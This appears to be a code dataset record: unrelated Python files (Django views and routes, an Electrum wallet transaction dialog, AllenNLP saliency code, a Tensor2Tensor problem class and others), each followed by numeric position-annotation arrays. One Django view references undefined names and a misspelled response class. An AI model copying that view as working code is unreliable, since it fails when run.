"""Gets the port of this CloudProxyCreateParams. # noqa: E501
The port used to connect to this proxy # noqa: E501
:return: The port of this CloudProxyCreateParams. # noqa: E501
:rtype: int
"""
return self._port
@port.setter
def port(self, port):
"""Sets the port of this CloudProxyCreateParams.
The port used to connect to this proxy # noqa: E501
:param port: The port of this CloudProxyCreateParams. # noqa: E501
:type: int
"""
if port is None:
raise ValueError("Invalid value for `port`, must not be `None`") # noqa: E501
self._port = port
@property
def type(self):
"""Gets the type of this CloudProxyCreateParams. # noqa: E501
The type of connection used to connect to this proxy # noqa: E501
:return: The type of this CloudProxyCreateParams. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this CloudProxyCreateParams.
The type of connection used to connect to this proxy # noqa: E501
:param type: The type of this CloudProxyCreateParams. # noqa: E501
:type: str
"""
if type is None:
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
allowed_values = ["socks_4", "socks_5", "http"] # noqa: E501
if type not in allowed_values:
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def username(self):
"""Gets the username of this CloudProxyCreateParams. # noqa: E501
The username to connect to this proxy if required # noqa: E501
:return: The username of this CloudProxyCreateParams. # noqa: E501
:rtype: str
"""
return self._username
@username.setter
def username(self, username):
"""Sets the username of this CloudProxyCreateParams.
The username to connect to this proxy if required # noqa: E501
:param username: The username of this CloudProxyCreateParams. # noqa: E501
:type: str
"""
self._username = username
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CloudProxyCreateParams):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
[
[
243,
249
],
[
7308,
7314
]
],
[
[
257,
259
]
],
[
[
282,
285
],
[
6504,
6507
]
],
[
[
332,
342
]
],
[
[
370,
392
],
[
7548,
7570
]
]
] |
from django.urls import include, path
from rest_framework import routers
from . import views
from .views import *
router = routers.DefaultRouter()
router.register(r"tracks", views.TrackViewSet)
urlpatterns = [
path("", include(router.urls)),
path('playlist/add', PlaylistAPIView.as_view()),
path('allplaylist/', PlayListViewSet.as_view({'get': 'list'})),
path('playlist/<id>', PlaylistAPIView.as_view()),
path('playlist/delete/<id>', PlaylistAPIView.as_view()),
path('playlist/addTrack/<id>', PlaylistAPIView.as_view(),name="addTrack"),
path('playlist/removeTrack/<id>', PlaylistAPIView.as_view(),name="removeTrack"),
]
| [
[
[
24,
31
],
[
226,
233
]
],
[
[
33,
37
],
[
217,
221
],
[
253,
257
],
[
306,
310
],
[
374,
378
],
[
429,
433
],
[
490,
494
],
[
569,
573
]
],
[
[
65,
72
],
[
125,
132
]
],
[
[
88,
93
],
[
176,
181
]
],
[
[
113,
114
],
[
274,
289
],
[
327,
342
],
[
396,
411
],
[
458,
473
],
[
521,
536
],
[
603,
618
]
],
[
[
116,
122
],
[
149,
155
],
[
234,
240
]
],
[
[
197,
208
]
]
] |
# Данный пример выводит изображения myImage_1 и myImage_2.
# Создаём изображение "смайлик".
myImage_1 = [ 0b00111100, #
0b01000010, #
0b10100101, #
0b10000001, #
0b10100101, #
0b10011001, #
0b01000010, #
0b00111100 ] #
# Создаём изображение "телевизор".
myImage_2 = [ 0b01000100, #
0b00101000, #
0b00010000, #
0b11111111, #
0b10000011, #
0b10000011, #
0b10000011, #
0b11111111 ] #
from pyiArduinoI2Cmatrix import * # Подключаем библиотеку для работы с LED матрицей 8x8.
from time import sleep # Импортируем функцию ожидания
disp = pyiArduinoI2Cmatrix(0x09) # Объявляем объект disp для работы с LED матрицей 8x8, указывая её адрес на шине I2C.
#
try: # Входим в блок исключений
while True: # Входим в бесконечный цикл
disp.drawImage(myImage_1), # Выводим на дисплей изображение списка myImage_1
sleep(2) # и ждём пару секунд.
disp.drawImage(myImage_2), # Выводим на дисплей изображение списка myImage_2
sleep(2) # и ждём пару секунд.
except: # Если поднято исключение (наример, сценарий завершён с клавиатуры
disp.reset() # сбрасываем параметры модуля.
| [
[
[
132,
141
],
[
1790,
1799
]
],
[
[
751,
760
],
[
1942,
1951
]
],
[
[
1329,
1330
],
[
1470,
1489
]
],
[
[
1409,
1414
],
[
1865,
1870
],
[
2017,
2022
]
],
[
[
1463,
1467
],
[
1775,
1779
],
[
1927,
1931
],
[
2183,
2187
]
]
] |
from django.http import HttpResponse
from django.views.decorators.http import require_http_methods
from django.shortcuts import render
import re
# Create your views here.
@require_http_methods(['GET', 'POST'])
def echo_0(request):
if request.method == 'GET' and something == None:
return render(request,'templates/echo.html',context)
elif request.method in ['POST', 'PUT']:
return HtppBadResponse(status=405)
def parser(string):
result = re.match(r'[aA-zZ]+',string)
return result.group(0)
# def echo(request):
# try:
# if (request.method == 'GET'):
# meta = parser(request.META['QUERY_STRING'])
# return render(request, 'echo.html', context={
# 'get_letters': meta,
# 'get_value': request.GET.get(meta),
# 'get_tag': request.META.get('HTTP_X_PRINT_STATEMENT'),
# 'request_method': request.META['REQUEST_METHOD'].lower()
# })
# elif request.method == 'POST':
# meta = parser(request.META['QUERY_STRING'])
# return render(request, 'echo.html', context={
# 'get_letters': meta,
# 'get_value': request.POST.get(meta),
# 'get_tag': request.META.get('HTTP_X_PRINT_STATEMENT'),
# 'request_method': request.META['REQUEST_METHOD'].lower()
# })
# except:
# return HttpResponse(status=404)
# def echo(request):
# if (request.method == 'GET'):
# meta = parser(request.META['QUERY_STRING'])
# return render(request, 'echo.html', context={
# 'get_letters': meta,
# 'get_value': request.GET.get(meta),
# 'get_tag': request.META.get('HTTP_X_PRINT_STATEMENT'),
# 'request_method': request.META['REQUEST_METHOD'].lower()
# })
# elif request.method == 'POST':
# #print(request.META['QUERY_STRING'])
# print(request.POST)
# return render(request, 'echo.html', context={
# 'get_letters':'a',
# 'get_value': 1,
# 'get_tag': request.META.get('HTTP_X_PRINT_STATEMENT'),
# 'request_method': request.META['REQUEST_METHOD'].lower()
# })
def echo(request):
context = {
'get' : request.GET,
'post' : request.POST,
'meta' : request.META
}
return render(request,"echo.html",context = context)
def filters(request):
return render(request, 'filters.html', context={
'a': request.GET.get('a', 1),
'b': request.GET.get('b', 1)
})
# <!-- {% extends base.html%} -->
#
def extend(request):
return render(request, 'extend.html', context={
'a': request.GET.get('a'),
'b': request.GET.get('b')
})
#
# <!--DOCTYPE html -->
# <html>
# <body>
# {% if 'QUERY_STRING' in request.META %}
# <h1> {{ request_method }} {{ get_letter }}: {{ get_value }} statement is empty </h1>
# {% elif 'HTTP_X_PRINT_STATEMENT' in request.META %}
# <h2> statement is {{get_tag}} </h2>
# {% endif %}
# </body>
# </html>
| [
[
[
24,
36
]
],
[
[
78,
98
],
[
173,
193
]
],
[
[
128,
134
],
[
301,
307
],
[
2404,
2410
],
[
2485,
2491
],
[
2679,
2685
]
],
[
[
142,
144
],
[
468,
470
]
],
[
[
215,
221
]
],
[
[
439,
445
]
],
[
[
2266,
2270
]
],
[
[
2456,
2463
]
],
[
[
2651,
2657
]
]
] |
from kivy.app import App
from kivy.factory import Factory
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from kivy.clock import Clock
from kivy.uix.label import Label
from electrum_commercium_gui.kivy.i18n import _
from datetime import datetime
from electrum_commercium.util import InvalidPassword
Builder.load_string('''
<TxDialog>
id: popup
title: _('Transaction')
is_mine: True
can_sign: False
can_broadcast: False
fee_str: ''
date_str: ''
date_label:''
amount_str: ''
tx_hash: ''
status_str: ''
description: ''
outputs_str: ''
BoxLayout:
orientation: 'vertical'
ScrollView:
GridLayout:
height: self.minimum_height
size_hint_y: None
cols: 1
spacing: '10dp'
padding: '10dp'
GridLayout:
height: self.minimum_height
size_hint_y: None
cols: 1
spacing: '10dp'
BoxLabel:
text: _('Status')
value: root.status_str
BoxLabel:
text: _('Description') if root.description else ''
value: root.description
BoxLabel:
text: root.date_label
value: root.date_str
BoxLabel:
text: _('Amount sent') if root.is_mine else _('Amount received')
value: root.amount_str
BoxLabel:
text: _('Transaction fee') if root.fee_str else ''
value: root.fee_str
TopLabel:
text: _('Outputs') + ':'
OutputList:
height: self.minimum_height
size_hint: 1, None
id: output_list
TopLabel:
text: _('Transaction ID') + ':' if root.tx_hash else ''
TxHashLabel:
data: root.tx_hash
name: _('Transaction ID')
Widget:
size_hint: 1, 0.1
BoxLayout:
size_hint: 1, None
height: '48dp'
Button:
size_hint: 0.5, None
height: '48dp'
text: _('Sign') if root.can_sign else _('Broadcast') if root.can_broadcast else ''
disabled: not(root.can_sign or root.can_broadcast)
opacity: 0 if self.disabled else 1
on_release:
if root.can_sign: root.do_sign()
if root.can_broadcast: root.do_broadcast()
IconButton:
size_hint: 0.5, None
height: '48dp'
icon: 'atlas://gui/kivy/theming/light/qrcode'
on_release: root.show_qr()
Button:
size_hint: 0.5, None
height: '48dp'
text: _('Close')
on_release: root.dismiss()
''')
class TxDialog(Factory.Popup):
def __init__(self, app, tx):
Factory.Popup.__init__(self)
self.app = app
self.wallet = self.app.wallet
self.tx = tx
def on_open(self):
self.update()
def update(self):
format_amount = self.app.format_amount_and_units
tx_hash, self.status_str, self.description, self.can_broadcast, amount, fee, height, conf, timestamp, exp_n = self.wallet.get_tx_info(self.tx)
self.tx_hash = tx_hash or ''
if timestamp:
self.date_label = _('Date')
self.date_str = datetime.fromtimestamp(timestamp).isoformat(' ')[:-3]
elif exp_n:
self.date_label = _('Mempool depth')
self.date_str = _('{} from tip').format('%.2f MB'%(exp_n/1000000))
else:
self.date_label = ''
self.date_str = ''
if amount is None:
self.amount_str = _("Transaction unrelated to your wallet")
elif amount > 0:
self.is_mine = False
self.amount_str = format_amount(amount)
else:
self.is_mine = True
self.amount_str = format_amount(-amount)
self.fee_str = format_amount(fee) if fee is not None else _('unknown')
self.can_sign = self.wallet.can_sign(self.tx)
self.ids.output_list.update(self.tx.outputs())
def do_sign(self):
self.app.protected(_("Enter your PIN code in order to sign this transaction"), self._do_sign, ())
def _do_sign(self, password):
self.status_str = _('Signing') + '...'
Clock.schedule_once(lambda dt: self.__do_sign(password), 0.1)
def __do_sign(self, password):
try:
self.app.wallet.sign_transaction(self.tx, password)
except InvalidPassword:
self.app.show_error(_("Invalid PIN"))
self.update()
def do_broadcast(self):
self.app.broadcast(self.tx)
def show_qr(self):
from electrum_commercium.bitcoin import base_encode, bfh
text = bfh(str(self.tx))
text = base_encode(text, base=43)
self.app.qr_dialog(_("Raw Transaction"), text)
| [
[
[
21,
24
]
],
[
[
50,
57
],
[
3149,
3156
],
[
3207,
3214
]
],
[
[
86,
100
]
],
[
[
123,
130
],
[
326,
333
]
],
[
[
154,
159
],
[
4719,
4724
]
],
[
[
187,
192
]
],
[
[
240,
241
],
[
3684,
3685
],
[
3826,
3827
],
[
3873,
3874
],
[
4060,
4061
],
[
4377,
4378
],
[
4550,
4551
],
[
4690,
4691
],
[
4958,
4959
],
[
5254,
5255
]
],
[
[
263,
271
],
[
3722,
3730
]
],
[
[
309,
324
],
[
4909,
4924
]
],
[
[
3140,
3148
]
]
] |
import math
from typing import List
import numpy
from allennlp.common.util import JsonDict, sanitize
from allennlp.interpret.saliency_interpreters.saliency_interpreter import SaliencyInterpreter
from allennlp.nn import util
@SaliencyInterpreter.register("simple-gradient")
class SimpleGradient(SaliencyInterpreter):
"""
Registered as a `SaliencyInterpreter` with name "simple-gradient".
"""
def saliency_interpret_from_json(self, inputs: JsonDict) -> JsonDict:
"""
Interprets the model's prediction for inputs. Gets the gradients of the loss with respect
to the input and returns those gradients normalized and sanitized.
"""
labeled_instances = self.predictor.json_to_labeled_instances(inputs)
# List of embedding inputs, used for multiplying gradient by the input for normalization
embeddings_list: List[numpy.ndarray] = []
instances_with_grads = dict()
for idx, instance in enumerate(labeled_instances):
# Hook used for saving embeddings
handle = self._register_forward_hook(embeddings_list)
grads = self.predictor.get_gradients([instance])[0]
handle.remove()
# Gradients come back in the reverse order that they were sent into the network
embeddings_list.reverse()
for key, grad in grads.items():
# Get number at the end of every gradient key (they look like grad_input_[int],
# we're getting this [int] part and subtracting 1 for zero-based indexing).
# This is then used as an index into the reversed input array to match up the
# gradient and its respective embedding.
input_idx = int(key[-1]) - 1
# The [0] here is undo-ing the batching that happens in get_gradients.
emb_grad = numpy.sum(grad[0] * embeddings_list[input_idx], axis=1)
norm = numpy.linalg.norm(emb_grad, ord=1)
normalized_grad = [math.fabs(e) / norm for e in emb_grad]
grads[key] = normalized_grad
instances_with_grads["instance_" + str(idx + 1)] = grads
return sanitize(instances_with_grads)
def _register_forward_hook(self, embeddings_list: List):
"""
Finds all of the TextFieldEmbedders, and registers a forward hook onto them. When forward()
is called, embeddings_list is filled with the embedding values. This is necessary because
our normalization scheme multiplies the gradient by the embedding value.
"""
def forward_hook(module, inputs, output):
embeddings_list.append(output.squeeze(0).clone().detach().numpy())
embedding_layer = util.find_embedding_layer(self.predictor._model)
handle = embedding_layer.register_forward_hook(forward_hook)
return handle
| [
[
[
7,
11
],
[
2029,
2033
]
],
[
[
32,
36
],
[
880,
884
],
[
2284,
2288
]
],
[
[
44,
49
],
[
885,
890
],
[
1880,
1885
],
[
1959,
1964
]
],
[
[
84,
92
],
[
472,
480
],
[
459,
467
]
],
[
[
94,
102
],
[
2198,
2206
]
],
[
[
177,
196
],
[
298,
317
],
[
229,
248
]
],
[
[
221,
225
],
[
2751,
2755
]
],
[
[
283,
297
]
]
] |
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_5 import models
class Qos(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'bandwidth_limit': 'int',
'iops_limit': 'int'
}
attribute_map = {
'bandwidth_limit': 'bandwidth_limit',
'iops_limit': 'iops_limit'
}
required_args = {
}
def __init__(
self,
bandwidth_limit=None, # type: int
iops_limit=None, # type: int
):
"""
Keyword args:
bandwidth_limit (int): The maximum QoS bandwidth limit for the volume. Whenever throughput exceeds the bandwidth limit, throttling occurs. Measured in bytes per second. Maximum limit is 512 GB/s.
iops_limit (int): The QoS IOPs limit for the volume.
"""
if bandwidth_limit is not None:
self.bandwidth_limit = bandwidth_limit
if iops_limit is not None:
self.iops_limit = iops_limit
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `Qos`".format(key))
if key == "bandwidth_limit" and value is not None:
if value > 549755813888:
raise ValueError("Invalid value for `bandwidth_limit`, value must be less than or equal to `549755813888`")
if value < 1048576:
raise ValueError("Invalid value for `bandwidth_limit`, must be a value greater than or equal to `1048576`")
if key == "iops_limit" and value is not None:
if value > 104857600:
raise ValueError("Invalid value for `iops_limit`, value must be less than or equal to `104857600`")
if value < 100:
raise ValueError("Invalid value for `iops_limit`, must be a value greater than or equal to `100`")
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Qos, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Qos):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
[
[
270,
276
],
[
3806,
3812
]
],
[
[
284,
286
]
],
[
[
295,
298
],
[
2788,
2791
]
],
[
[
306,
312
],
[
353,
359
]
],
[
[
341,
349
],
[
2584,
2592
]
],
[
[
422,
428
]
],
[
[
436,
439
],
[
3592,
3595
],
[
4046,
4049
]
]
] |
# Copyright 2019 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Pigweed build environment for bazel."""
DEBUGGING = [
"-g",
]
# Standard compiler flags to reduce output binary size.
REDUCED_SIZE_COPTS = [
"-fno-common",
"-fno-exceptions",
"-ffunction-sections",
"-fdata-sections",
]
STRICT_WARNINGS_COPTS = [
"-Wall",
"-Wextra",
# Make all warnings errors, except for the exemptions below.
"-Werror",
"-Wno-error=cpp", # preprocessor #warning statement
"-Wno-error=deprecated-declarations", # [[deprecated]] attribute
]
CPP17_COPTS = [
"-std=c++17",
"-fno-rtti",
"-Wnon-virtual-dtor",
# Allow uses of the register keyword, which may appear in C headers.
"-Wno-register",
]
DISABLE_PENDING_WORKAROUND_OPTS = [
"-Wno-private-header",
]
PW_DEFAULT_COPTS = (
DEBUGGING +
REDUCED_SIZE_COPTS +
STRICT_WARNINGS_COPTS +
DISABLE_PENDING_WORKAROUND_OPTS
)
PW_DEFAULT_LINKOPTS = []
def _add_defaults(kwargs):
"""Adds default arguments suitable for both C and C++ code to kwargs."""
kwargs["copts"] = kwargs.get("copts", []) + PW_DEFAULT_COPTS
kwargs["linkopts"] = kwargs.get("linkopts", []) + PW_DEFAULT_LINKOPTS
# Set linkstatic to avoid building .so files.
kwargs["linkstatic"] = True
kwargs.setdefault("features", [])
# Crosstool--adding this line to features disables header modules, which
# don't work with -fno-rtti. Note: this is not a command-line argument,
# it's "minus use_header_modules".
kwargs["features"].append("-use_header_modules")
def _default_cc_and_c_kwargs(kwargs):
_add_defaults(kwargs)
kwargs.setdefault("srcs", [])
cc = dict(kwargs.items())
cc["srcs"] = [src for src in kwargs["srcs"] if not src.endswith(".c")]
cc["copts"] = cc["copts"] + CPP17_COPTS
c_srcs = [src for src in kwargs["srcs"] if src.endswith(".c")]
if c_srcs:
c = dict(kwargs.items())
c["name"] += "_c"
c["srcs"] = c_srcs + [src for src in kwargs["srcs"] if src.endswith(".h")]
cc["deps"] = cc.get("deps", []) + [":" + c["name"]]
return cc, c
return cc, None
def _add_cc_and_c_targets(target, kwargs):
cc_kwargs, c_kwargs = _default_cc_and_c_kwargs(kwargs)
if c_kwargs:
native.cc_library(**c_kwargs)
target(**cc_kwargs)
def pw_cc_binary(**kwargs):
_add_cc_and_c_targets(native.cc_binary, kwargs)
def pw_cc_library(**kwargs):
_add_cc_and_c_targets(native.cc_library, kwargs)
def pw_cc_test(**kwargs):
kwargs["deps"] = kwargs.get("deps", []) + ["//pw_unit_test:main"]
_add_cc_and_c_targets(native.cc_test, kwargs)
| [
[
[
629,
638
],
[
1359,
1368
]
],
[
[
712,
730
],
[
1375,
1393
]
],
[
[
830,
851
],
[
1400,
1421
]
],
[
[
1094,
1105
],
[
2338,
2349
]
],
[
[
1268,
1299
],
[
1428,
1459
]
],
[
[
1334,
1350
],
[
1642,
1658
]
],
[
[
1463,
1482
],
[
1713,
1732
]
],
[
[
1493,
1506
],
[
2144,
2157
]
],
[
[
2106,
2130
],
[
2749,
2773
]
],
[
[
2684,
2705
],
[
2896,
2917
],
[
2978,
2999
],
[
3128,
3149
]
],
[
[
2868,
2880
]
],
[
[
2949,
2962
]
],
[
[
3032,
3042
]
]
] |
# -*- coding: utf-8 -*-
from framework.routing import Rule, json_renderer
from website.addons.github import views
settings_routes = {
'rules': [
# Configuration
Rule(
[
'/project/<pid>/github/settings/',
'/project/<pid>/node/<nid>/github/settings/',
],
'post',
views.config.github_set_config,
json_renderer,
),
Rule(
[
'/project/<pid>/github/settings/',
'/project/<pid>/node/<nid>/github/settings/',
],
'get',
views.config.github_get_config,
json_renderer,
),
Rule(
[
'/project/<pid>/github/settings/',
'/project/<pid>/node/<nid>/github/settings/',
'/project/<pid>/github/config/',
'/project/<pid>/node/<nid>/github/config/',
],
'delete',
views.config.github_remove_node_settings,
json_renderer,
),
Rule(
[
'/project/<pid>/github/repos/',
'/project/<pid>/node/<nid>/github/repos/',
],
'get',
views.config.github_repo_list,
json_renderer,
),
Rule(
[
'/project/<pid>/github/tarball/',
'/project/<pid>/node/<nid>/github/tarball/',
],
'get',
views.crud.github_download_starball,
json_renderer,
{'archive': 'tar'},
endpoint_suffix='__tar',
),
Rule(
[
'/project/<pid>/github/zipball/',
'/project/<pid>/node/<nid>/github/zipball/',
],
'get',
views.crud.github_download_starball,
json_renderer,
{'archive': 'zip'},
endpoint_suffix='__zip',
),
Rule(
[
'/project/<pid>/github/hook/',
'/project/<pid>/node/<nid>/github/hook/',
],
'post',
views.hooks.github_hook_callback,
json_renderer,
),
# OAuth: User
Rule(
'/settings/github/oauth/',
'get',
views.auth.github_oauth_start,
json_renderer,
endpoint_suffix='__user',
),
Rule(
'/settings/github/oauth/',
'delete',
views.auth.github_oauth_delete_user,
json_renderer,
),
# OAuth: Node
Rule(
[
'/project/<pid>/github/oauth/',
'/project/<pid>/node/<nid>/github/oauth/',
],
'get',
views.auth.github_oauth_start,
json_renderer,
),
Rule(
[
'/project/<pid>/github/user_auth/',
'/project/<pid>/node/<nid>/github/user_auth/',
],
'post',
views.auth.github_add_user_auth,
json_renderer,
),
Rule(
[
'/project/<pid>/github/oauth/',
'/project/<pid>/node/<nid>/github/oauth/',
'/project/<pid>/github/config/',
'/project/<pid>/node/<nid>/github/config/'
],
'delete',
views.auth.github_oauth_deauthorize_node,
json_renderer,
),
# OAuth: General
Rule(
[
'/addons/github/callback/<uid>/',
'/addons/github/callback/<uid>/<nid>/',
],
'get',
views.auth.github_oauth_callback,
json_renderer,
),
],
'prefix': '/api/v1',
}
api_routes = {
'rules': [
Rule(
[
'/project/<pid>/github/newrepo/',
'/project/<pid>/node/<nid>/github/newrepo/',
],
'post',
views.repos.github_create_repo,
json_renderer,
),
Rule(
[
'/project/<pid>/github/hgrid/',
'/project/<pid>/node/<nid>/github/hgrid/',
'/project/<pid>/github/hgrid/<path:path>/',
'/project/<pid>/node/<nid>/github/hgrid/<path:path>/',
],
'get',
views.hgrid.github_hgrid_data_contents,
json_renderer,
),
Rule(
[
'/project/<pid>/github/hgrid/root/',
'/project/<pid>/node/<nid>/github/hgrid/root/',
],
'get',
views.hgrid.github_root_folder_public,
json_renderer,
),
],
'prefix': '/api/v1'
}
| [
[
[
55,
59
],
[
185,
189
],
[
444,
448
],
[
702,
706
],
[
1082,
1086
],
[
1334,
1338
],
[
1663,
1667
],
[
1993,
1997
],
[
2269,
2273
],
[
2460,
2464
],
[
2645,
2649
],
[
2895,
2899
],
[
3157,
3161
],
[
3556,
3560
],
[
3874,
3878
],
[
4132,
4136
],
[
4522,
4526
]
],
[
[
61,
74
],
[
409,
422
],
[
667,
680
],
[
1047,
1060
],
[
1298,
1311
],
[
1560,
1573
],
[
1889,
1902
],
[
2211,
2224
],
[
2388,
2401
],
[
2588,
2601
],
[
2861,
2874
],
[
3122,
3135
],
[
3496,
3509
],
[
3774,
3787
],
[
4097,
4110
],
[
4488,
4501
],
[
4756,
4769
]
],
[
[
110,
115
],
[
365,
370
],
[
623,
628
],
[
993,
998
],
[
1255,
1260
],
[
1511,
1516
],
[
1840,
1845
],
[
2165,
2170
],
[
2345,
2350
],
[
2539,
2544
],
[
2818,
2823
],
[
3077,
3082
],
[
3442,
3447
],
[
3728,
3733
],
[
4053,
4058
],
[
4436,
4441
],
[
4705,
4710
]
],
[
[
117,
132
]
],
[
[
3835,
3845
]
]
] |
import matplotlib.pyplot as plt
from math import pi
import numpy as np | [
[
[
7,
31
]
],
[
[
49,
51
]
],
[
[
59,
70
]
]
] |
# coding=utf-8
# Copyright 2017 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base class for problem/dataset definitions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import random
# Dependency imports
import six
from tensor2tensor.data_generators import generator_utils
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.utils import metrics
from tensor2tensor.utils import registry
import tensorflow as tf
class SpaceID(object):
"""Input and target space ids. Add more as needed."""
# Generic / unknown output space (default)
GENERIC = 0
# Image labels
IMAGE_LABEL = 1
# English characters
EN_CHR = 2
# English tokens
EN_TOK = 3
# English bpe tokens
EN_BPE_TOK = 4
# French characters
FR_CHR = 5
# French tokens
FR_TOK = 6
# German characters
DE_CHR = 7
# German tokens
DE_TOK = 8
# German bpe tokens
DE_BPE_TOK = 9
# Digit cipher lexicon 0
DIGIT_0 = 10
# Digit cipher lexicon 1
DIGIT_1 = 11
# Audio waveform domain
AUDIO_WAV = 12
# Audio spectral domain
AUDIO_SPECTRAL = 13
# Parse characters
PARSE_CHR = 14
# Parse tokens
PARSE_TOK = 15
# Chinese tokens
ZH_TOK = 16
# Icelandic characters
ICE_CHAR = 17
# Icelandic tokens
ICE_TOK = 18
# Icelandic parse tokens
ICE_PARSE_TOK = 19
# Macedonian tokens
MK_TOK = 20
# Czech tokens
CS_TOK = 21
# Czech characters
CS_CHR = 22
# Genetic bases (ACTG)
DNA = 23
# Real numbers
REAL = 24
# Images
IMAGE = 25
# Peptide
PEPTIDE = 26
# Python
PY_TOK = 27
# C++
CPP_TOK = 28
# Strokes
STROKES = 29
# Pickled Python
PICKLED_PYTHON = 30
def default_model_hparams():
return tf.contrib.training.HParams(
max_input_seq_length=0,
max_target_seq_length=0,
prepend_mode="none",
data_dir=None)
def preprocess_example_common(example, hparams, mode):
"""Preprocessing steps common to all models."""
if hparams.max_input_seq_length > 0:
example["inputs"] = example["inputs"][:hparams.max_input_seq_length]
if hparams.max_target_seq_length > 0:
example["targets"] = example["targets"][:hparams.max_target_seq_length]
if hparams.prepend_mode != "none":
if mode == tf.estimator.ModeKeys.PREDICT:
example["partial_targets"] = tf.concat([example["inputs"], [0]], 0)
else:
example["targets"] = tf.concat(
[example["inputs"], [0], example["targets"]], 0)
return example
class Problem(object):
"""Problem base class. Specifies a T2T problem.
Problems unify the specification of a problem for data generation, training,
and inference.
New problems are specified by the following methods:
Data generation:
* generate_data(data_dir, tmp_dir)
- Generate training and dev datasets into data_dir.
- Additional files, e.g. vocabulary files, should also be written to
data_dir. Vocab files are newline-separated files with each line
containing a token. The standard convention for the filename is to
set it to be
${Problem.vocab_name}.${Problem.targeted_vocab_size}
- Downloads and other files can be written to tmp_dir
- If you have a training and dev generator, you can generate the
training and dev datasets with
generator_utils.generate_dataset_and_shuffle.
- Use the self.training_filepaths and self.dev_filepaths functions to
get sharded filenames. If shuffled=False, the filenames will contain
an "unshuffled" suffix; you should then shuffle the data
shard-by-shard with generator_utils.shuffle_dataset.
- Allows to specify the number of shards, optionally (can be omitted).
- Subclasses must override
* dataset_filename()
- Base filename for problem.
- Defaults to registered name (self.name).
Training:
* hparams(defaults, model_hparams)
- Specify the problem hyperparameters (see _default_hparams)
- Mutate defaults as needed
* example_reading_spec
- Specify the names and types of the features on disk.
- Specify tf.contrib.slim.tfexample_decoder
* preprocess_example(example, mode)
- Preprocess the example feature dict from feature name to Tensor or
SparseTensor.
- Used in training, eval, and inference (specified by mode).
Eval:
* eval_metrics
- Specify the set of evaluation metrics for this problem.
Inference:
* feature_encoders(data_dir)
- Return a dict of <feature name, TextEncoder> for encoding and decoding
inference input/output.
- Defaults to TextEncoder for inputs and targets.
"""
# ============================================================================
# BEGIN SUBCLASS INTERFACE
# ============================================================================
def generate_data(self, data_dir, tmp_dir, task_id=-1):
raise NotImplementedError()
def hparams(self, defaults, model_hparams):
pass
def dataset_filename(self):
return self.name
def feature_encoders(self, data_dir):
del data_dir
return {
"inputs": text_encoder.TextEncoder(),
"targets": text_encoder.TextEncoder()
}
def example_reading_spec(self):
data_fields = {
"inputs": tf.VarLenFeature(tf.int64),
"targets": tf.VarLenFeature(tf.int64)
}
data_items_to_decoders = None
return (data_fields, data_items_to_decoders)
def preprocess_example(self, example, mode, hparams):
return preprocess_example_common(example, hparams, mode)
def eval_metrics(self):
return [
metrics.Metrics.ACC, metrics.Metrics.ACC_TOP5,
metrics.Metrics.ACC_PER_SEQ, metrics.Metrics.NEG_LOG_PERPLEXITY
]
# ============================================================================
# END SUBCLASS INTERFACE
# ============================================================================
